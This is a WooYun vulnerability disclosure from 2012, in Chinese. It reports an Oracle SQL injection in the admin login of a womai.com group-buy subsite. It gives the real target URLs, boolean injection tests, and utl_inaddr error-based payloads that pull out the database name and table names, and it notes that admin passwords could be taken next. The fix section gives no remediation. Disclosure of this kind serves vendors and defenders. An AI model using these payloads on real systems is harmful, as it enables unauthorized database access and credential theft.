漏洞概要 关注数(24) 关注此漏洞
>
漏洞详情
披露状态:
2012-09-26: 细节已通知厂商并且等待厂商处理中
2012-09-27: 厂商已经确认,细节仅向厂商公开
2012-10-07: 细节向核心白帽子及相关领域专家公开
2012-10-17: 细节向普通白帽子公开
2012-10-27: 细节向实习白帽子公开
2012-11-10: 细节向公众公开
简要描述:
我买网某分站后台注入
详细说明:
首先是后台地址泄漏
http://tuan.womai.com/groupBuy/listOrderManage.jsp
后台登陆地址:
http://tuan.womai.com/login.jsp
登陆处存在 oracle 注入
http://tuan.womai.com/j_spring_security_check?j_password=a&j_username=admin' and 1=1--
http://tuan.womai.com/j_spring_security_check?j_password=a&j_username=admin' and 1=2--
根据反回的信息不同,存在注入。
漏洞证明:
查数据库名:
http://tuan.womai.com/j_spring_security_check?j_password=a&j_username=admin' or 1=utl_inaddr.get_host_address((select chr(126)||chr(39)||name||chr(39)||chr(126) from v$database where rownum=1)) and '1'='1
查表
http://tuan.womai.com/j_spring_security_check?j_password=a&j_username=admin' or 1=utl_inaddr.get_host_address((select chr(126)||chr(39)||TABLE_NAME||chr(39)||chr(126) from USER_TABLES where rownum=1)) and '1'='1
这里就不深入了,查出管理员用户密码进入管理后台。或者直接是获取数据库同容了,危害应该比较大。
修复方案:
都懂得!
版权声明:转载请注明来源 kobin97@乌云
>
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:12
确认时间:2012-09-27 18:12
厂商回复:
感谢热情提交此漏洞。。我们尽快处理。
最新状态:
暂无